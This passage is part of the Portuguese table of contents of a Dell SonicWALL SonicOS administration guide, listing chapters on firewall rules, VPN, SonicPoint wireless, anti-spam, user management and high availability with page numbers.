3G/4G > Configuraes. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 427
Conectar em dados . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 428
Gerenciamento/Login do usurio . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 428
3G/4G > Avanado . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 429
Discagem acionada remotamente. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 429
Gerenciamento de largura de banda. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 430
Limite de conexo . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 430
3G/4G > Perfis de conexo . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 431
Guia Parmetros . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 433
Guia endereos IP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 434
Guia Programao . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 435
Guia Limite de dados. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 436
Guia Avanado . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 437
3G/4G > Uso de dados . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 438
Habilitar a interface U0/U1/M0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 439
Captulo 32. Configurando o modem . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 441
Modem . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 441
Modem > Status . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 441
Modem > Configuraes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 442
Modem > Avanado . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 443
Modem > Perfis de conexo . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 445
Parte 7. Configuraes
Captulo 33. Gerenciando SonicPoints . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 455
SonicPoint > SonicPoints . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 455
Antes de gerenciar SonicPoints . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 456
Perfis de provisionamento do SonicPoint . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 456
Prticas recomendadas para implantao do SonicPoint . . . . . . . . . . . . . . . . . . . . 474
Pr-requisitos . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 474
Comutadores testados . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 475
Consideraes de fiao . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 475
Canais . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 476
PoE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 477
rvore de abrangncia . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 478
VTP e GVRP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 478
Agregao de porta . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 478
Transmisso de otimizao/tempestade de transmisso . . . . . . . . . . . . . . . . . 478
Problemas com VAP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 479

Soluo de problemas. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 479
Reconfigurando o SonicPoint . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 480
Dicas de programao do comutador . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 481
Captulo 34. Visualizao do Status da Estao . . . . . . . . . . . . . . . . . . . . . . . . . . 483
SonicPoint > Status da Estao . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 483
Captulo 35. Servios de deteco de intruso do SonicPoint . . . . . . . . . . . . . . . 487
SonicPoint > IDS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 487
Verificando ponto de acesso . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 489
Pontos de acesso autorizados . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 490
Registro de eventos de Servios de deteco de intruso . . . . . . . . . . . . . . . . 491
Captulo 36. Configurando pontos de acesso virtuais . . . . . . . . . . . . . . . . . . . . . . 493
SonicPoint > Ponto de acesso virtual . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 493
Viso geral do SonicPoint VAP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 493
Pr-requisitos . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 496
Restries de implantao . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 497
Lista de tarefas de configurao de AP Virtual do SonicPoint . . . . . . . . . . . . . 497
Pensando de forma crtica sobre VAPs. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 509
Configuraes de amostra VAP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 512
Captulo 37. Configurar monitoramento por RF . . . . . . . . . . . . . . . . . . . . . . . . . . . 529
Sonic Point > Monitoramento por RF . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 529
Compreenso do Monitoramento por radiofrequncia . . . . . . . . . . . . . . . . . . . 529
Configurando o recurso de Monitoramento por RF . . . . . . . . . . . . . . . . . . . . . . 535
Aplicativos de Campo para Monitoramento por RF prticos . . . . . . . . . . . . . . . 538
Captulo 38. Usando a Anlise RF . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 541
SonicPoint > Anlise RF . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 541
Viso geral de Anlise RF . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 541
Usando a Anlise RF em SonicPoint(s) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 542
Captulo 39. SonicPoint FairNet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 547
SonicPoint > FairNet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 547
Compreendendo o SonicPoint FairNet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 547
Configurando o SonicPoint FairNet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 551
Parte 8. Firewall
Captulo 40. Configurar regras de acesso do firewall . . . . . . . . . . . . . . . . . . . . . . 555
Firewall > Regras de acesso . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 555
Viso geral de regras de acesso padro de inspeo de pacotes com
monitorao de estado . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 556
Viso geral do uso do gerenciamento de largura de banda com
as regras de acesso . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 557
Configurando regras de acesso para o IPv6 . . . . . . . . . . . . . . . . . . . . . . . . . . . 558
Lista de tarefas de configurao . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 558
| 11
Captulo 41. Configurando objetos de largura de banda . . . . . . . . . . . . . . . . . . . . 569
Firewall > Objetos de largura de banda . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 569
Gerenciamento avanado da largura de banda . . . . . . . . . . . . . . . . . . . . . . . . 569
Captulo 42. Configurar o Controle de aplicativos . . . . . . . . . . . . . . . . . . . . . . . . . 573
Controle de aplicativos . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 573
Viso geral do Controle de aplicativos . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 573
Licenciar o Controle de aplicativos . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 606
Firewall > Controle de aplicativos avanado . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 609
Firewall > Regras de acesso . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 619
Configurar uma poltica de regras de aplicativos . . . . . . . . . . . . . . . . . . . . . . . 620
Usar o assistente de Controle de aplicativos . . . . . . . . . . . . . . . . . . . . . . . . . . 624
Firewall > Objetos de correspondncia . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 627
Configurar objetos da lista de aplicativos . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 630
Firewall > Objetos de ao . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 631
Firewall > Objetos de endereos . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 632
Firewall > Objetos de servios . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 632
Firewall > Objetos de largura de banda . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 633
Firewall > Objetos de endereo de e-mail . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 633
Verificar configurao do controle de aplicativos . . . . . . . . . . . . . . . . . . . . . . . 634
Casos de uso do controle de aplicativos . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 641
Glossrio . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 667
Parte 9. Configuraes de firewall

Captulo 43. Definir configuraes avanadas de firewall . . . . . . . . . . . . . . . . . . . 671
Configuraes de firewall > Avanado . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 671
Preveno de deteco. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 672
Portas dinmicas . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 672
Pacotes roteados de origem . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 673
Conexes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 673
Opes de regras de acesso. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 674
Imposio de soma de verificao de IP e UDP . . . . . . . . . . . . . . . . . . . . . . . . 674
Quadro Jumbo. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 674
Configuraes avanadas de IPv6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 675
Captulo 44. Configurar gerenciamento de largura de banda . . . . . . . . . . . . . . . . 677
Configuraes de firewall > BWM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 677
Compreender o gerenciamento de largura de banda . . . . . . . . . . . . . . . . . . . . 678
Configurar a pgina Configuraes de firewall > BWM. . . . . . . . . . . . . . . . . . . 679
Gerenciamento avanado da largura de banda . . . . . . . . . . . . . . . . . . . . . . . . 693
Configurar o gerenciamento de largura de banda avanado . . . . . . . . . . . . . . 697
Atualizar o gerenciamento avanado da largura de banda . . . . . . . . . . . . . . . . 704
Glossrio . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 706

Captulo 45. Configurar proteo contra inundao . . . . . . . . . . . . . . . . . . . . . . . 707
Configuraes de firewall > Proteo contra inundao . . . . . . . . . . . . . . . . . . . . . 707
Configuraes de TCP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 708
Mtodos de proteo contra inundao SYN . . . . . . . . . . . . . . . . . . . . . . . . . . 709
Configurar a proteo contra inundao SYN de camada 3 . . . . . . . . . . . . . . . 711
Configurar a proteo contra inundao SYN/RST/FIN de camada 2 -
Lista negra MAC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 713
Proteo contra DDOS de WAN (Inundaes no-TCP) . . . . . . . . . . . . . . . . . 714
Configuraes UDP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 714
Proteo contra inundao UDP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 714
Proteo contra inundao ICMP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 714
Estatsticas de trfego . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 715
Captulo 46. Definir configuraes de difuso seletiva do firewall . . . . . . . . . . . . 719
Configuraes de firewall > Difuso seletiva. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 719
Rastreamento de difuso seletiva . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 720
Polticas de difuso seletiva . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 720
Tabela de estados IGMP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 721
Habilitar difuso seletiva em interfaces dedicadas de LAN. . . . . . . . . . . . . . . . 721
Habilitar difuso seletiva atravs de uma VPN . . . . . . . . . . . . . . . . . . . . . . . . . 723
Captulo 47. Gerenciar a Qualidade de Servio . . . . . . . . . . . . . . . . . . . . . . . . . . . 725
Configuraes de firewall > Mapeamento QoS. . . . . . . . . . . . . . . . . . . . . . . . . . . . 725
Classificao . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 725
Marcao. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 726
Condicionamento. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 727
QoS 802.1p e DSCP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 728
Gerenciamento de largura de banda. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 739
Glossrio . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 739
Captulo 48. Configurar o Controle SSL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 743
Configuraes de firewall > Controle SSL. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 743
Viso geral do Controle SSL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 743
Configurao de Controle SSL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 751
Habilitar o Controle de SSL em zonas . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 753
Eventos do Controle SSL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 754
Parte 10. DPI-SSL

Captulo 49. Definir configuraes DPI-SSL de cliente . . . . . . . . . . . . . . . . . . . . . 759
DPI-SSL > SSL do cliente . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 759
Viso geral de DPI-SSL. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 759
Configurar o DPI-SSL do cliente . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 760
Captulo 50. Definir configuraes DPI-SSL do servidor . . . . . . . . . . . . . . . . . . . . 765
DPI-SSL > SSL do servidor. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 765
Viso geral de DPI-SSL. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 765
| 13
Definir configuraes DPI-SSL do servidor . . . . . . . . . . . . . . . . . . . . . . . . . . . . 766
Parte 11. VoIP

Captulo 51. Configurando o suporte de VoIP . . . . . . . . . . . . . . . . . . . . . . . . . . . . 773
VoIP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 773
Viso geral de VoIP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 773
O que VoIP? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 773
Segurana VoIP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 774
Protocolos de VoIP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 775
Recursos de VoIP da SonicWALL. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 776
Configuraes de VoIP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 783
Configurando recursos de VoIP da SonicWALL . . . . . . . . . . . . . . . . . . . . . . . . 783
Status de chamada VoIP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 791
Parte 12. Anti-spam

Captulo 52. Configurar o anti-spam. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 795
Anti-spam . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 795
Viso geral do anti-spam. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 795
O que anti-spam? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 796
Benefcios . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 796
Como funciona o servio anti-spam? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 797
Adquirir uma licena de anti-spam . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 801
Anti-spam > Status . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 802
Anti-spam > Configuraes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 803
Configurar o anti-spam do UTM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 804
Anti-spam > Estatsticas . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 807
Anti-spam > Filtro de lista negra em tempo real . . . . . . . . . . . . . . . . . . . . . . . . . . . 807
Anti-spam > Viso da caixa de lixo eletrnico. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 811
Anti-Spam > Configuraes da caixa de lixo eletrnico . . . . . . . . . . . . . . . . . . . . . 813
Anti-spam > Resumo de lixo eletrnico. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 814
Anti-spam > Configurao de exibio do usurio . . . . . . . . . . . . . . . . . . . . . . . . . 816
Anti-Spam > Catlogos de endereos. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 817
Anti-spam > Gerenciar usurios . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 819
Anti-Spam > Configurao LDAP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 820
Anti-spam > Avanado . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 824
Anti-spam > Downloads . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 825
Parte 13. VPN

Captulo 53. Configurando polticas de VPN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 829
VPN > Configuraes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 829
Viso geral sobre VPN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 829
Configurando VPNs no SonicOS. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 833

Configurando VPNs para o IPv6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 836
Configurando polticas do GroupVPN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 838
Configuraes VPN site a site. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 845
Criando polticas de VPN site a site . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 846
VPN baseado em Rota . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 859
Usando a VPN baseada em Rota . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 859
Adicionando uma Interface de tnel . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 859
Criando uma rota esttica para a Interface de tnel . . . . . . . . . . . . . . . . . . . . . 860
Entradas de rota para diferentes segmentos de rede . . . . . . . . . . . . . . . . . . . . 861
Rotas estticas redundantes para uma rede. . . . . . . . . . . . . . . . . . . . . . . . . . . 861
Interface de tnel solta . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 861
Controle de regra de acesso VPN adicionada automaticamente . . . . . . . . . . . 862
Captulo 54. Definindo configuraes avanadas de VPN . . . . . . . . . . . . . . . . . . . 865
VPN > Avanado . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 865
Definindo configuraes avanadas de VPN . . . . . . . . . . . . . . . . . . . . . . . . . . 866
Usando o OCSP com dispositivos de segurana de rede da
Dell SonicWALL. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 868
Captulo 55. Configurando o DHCP sobre VPN . . . . . . . . . . . . . . . . . . . . . . . . . . . 871
VPN > DHCP sobre VPN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 871
Modo de retransmisso de DHCP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 871
Configurando o gateway central para DHCP sobre VPN . . . . . . . . . . . . . . . . . 872
Configurando o gateway remoto DHCP sobre VPN . . . . . . . . . . . . . . . . . . . . . 872
Concesses atuais de DHCP sobre VPN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 875
Captulo 56. Configurando servidores L2TP e Acesso de cliente de VPN . . . . . . . 877
VPN > Servidor L2TP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 877
Configurando o servidor L2TP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 878
Exibindo atualmente sesses L2TP ativas . . . . . . . . . . . . . . . . . . . . . . . . . . . . 880
Configurando o acesso de cliente de VPN L2TP do Microsoft Windows . . . . . 880
Configurando o acesso de cliente VPN L2TP do Google Android . . . . . . . . . . 882
Parte 14. SSL VPN

Captulo 57. Configurao SSL VPN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 887
SSL VPN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 887
SSL VPN NetExtender Viso geral . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 888
Configurao de Usurios para Acesso SSL VPN . . . . . . . . . . . . . . . . . . . . . . 890
SSL VPN > Status . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 892
SSL VPN > Configuraes do Servidor. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 893
SSL VPN > Configuraes do Portal. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 894
SSL VPN > Configuraes do Cliente. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 896
SSL VPN > Rotas de clientes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 899
SSL VPN > Virtual Office. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 901
Acesso ao Portal SSL VPN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 901
| 15
Uso do NetExtender . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 901
Configurao de Marcadores SSL VPN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 927
Uso de Marcadores SSL VPN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 931
Parte 15. Virtual Assist

Captulo 58. Configurando o Virtual Assist . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 941
Virtual Assist . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 941
Viso geral do Virtual Assist . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 941
Virtual Assist > Status . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 941
Virtual Assist > Configuraes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 942
Usando o Virtual Assist . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 945
Parte 16. Gerenciamento de usurio

Captulo 59. Gerenciando configuraes de usurios e de autenticao . . . . . . . 951
Gerenciamento de usurios . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 951
Introduo ao Gerenciamento de usurios . . . . . . . . . . . . . . . . . . . . . . . . . . . . 951
Exibindo o status em Usurios > Status . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 973
Definindo as configuraes em Usurios > Configuraes. . . . . . . . . . . . . . . . 973
Configurando os Usurios locais. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 983
Configurando Grupos locais . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 988
Configurando a autenticao RADIUS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 993
Configurando a integrao do LDAP no SonicOS. . . . . . . . . . . . . . . . . . . . . . . 999
Configurandoo Login nico . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1013
Configurando o Suporte para mltiplos administradores . . . . . . . . . . . . . . . . 1068
Captulo 60. Gerenciando servios para convidados
e contas de convidados . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1075
Usurios > Servios de convidados . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1075
Configuraes de convidados globais. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1076
Perfis de convidados . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1076
Usurios > Contas de convidados. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1077
Exibindo estatsticas de conta de convidado. . . . . . . . . . . . . . . . . . . . . . . . . . 1078
Adicionando contas de convidados . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1078
Habilitando contas de convidados. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1081
Habilitando Expurgar automaticamente para contas de convidados . . . . . . . 1081
Imprimindo detalhes da conta . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1082
Usurios > Status de convidados . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1082
Efetuando login nas contas fora do dispositivo . . . . . . . . . . . . . . . . . . . . . . . . 1083
Parte 17. Alta disponibilidade

Captulo 61. Configurar a Alta disponibilidade . . . . . . . . . . . . . . . . . . . . . . . . . . 1087
Alta disponibilidade . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1087
Viso geral da Alta disponibilidade . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1087

Modos de Alta disponibilidade. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1088
Viso geral de AD ativa/em espera . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1092
Viso geral da Sincronizao estvel . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1093
Viso geral de AD de DPI ativa/ativa . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1095
Pr-requisitos de DPI ativa/em espera e ativa/ativa . . . . . . . . . . . . . . . . . . . . 1095
Conectando fisicamente seus dispositivos . . . . . . . . . . . . . . . . . . . . . . . . . . . 1096
Registrar e associar dispositivos no MySonicWALL . . . . . . . . . . . . . . . . . . . . 1097
Licenciar recursos de alta disponibilidade. . . . . . . . . . . . . . . . . . . . . . . . . . . . 1098
Alta disponibilidade > Status . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1101
Status de alta disponibilidade ativa/em espera . . . . . . . . . . . . . . . . . . . . . . . . 1101
Status de alta disponibilidade ativa/ativa. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1104
Alta disponibilidade > Configuraes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1104
Definir configuraes de alta disponibilidade ativa/em espera . . . . . . . . . . . . 1105
Definir configuraes de alta disponibilidade de DPI ativa/ativa . . . . . . . . . . . 1107
Alta disponibilidade > Avanado . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1109
Configurar Alta disponibilidade > Avanado . . . . . . . . . . . . . . . . . . . . . . . . . . 1110
Alta disponibilidade > Monitoramento . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1111
Monitoramento de alta disponibilidade ativa/em espera . . . . . . . . . . . . . . . . . 1112
Clustering ativo/ativo . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1114
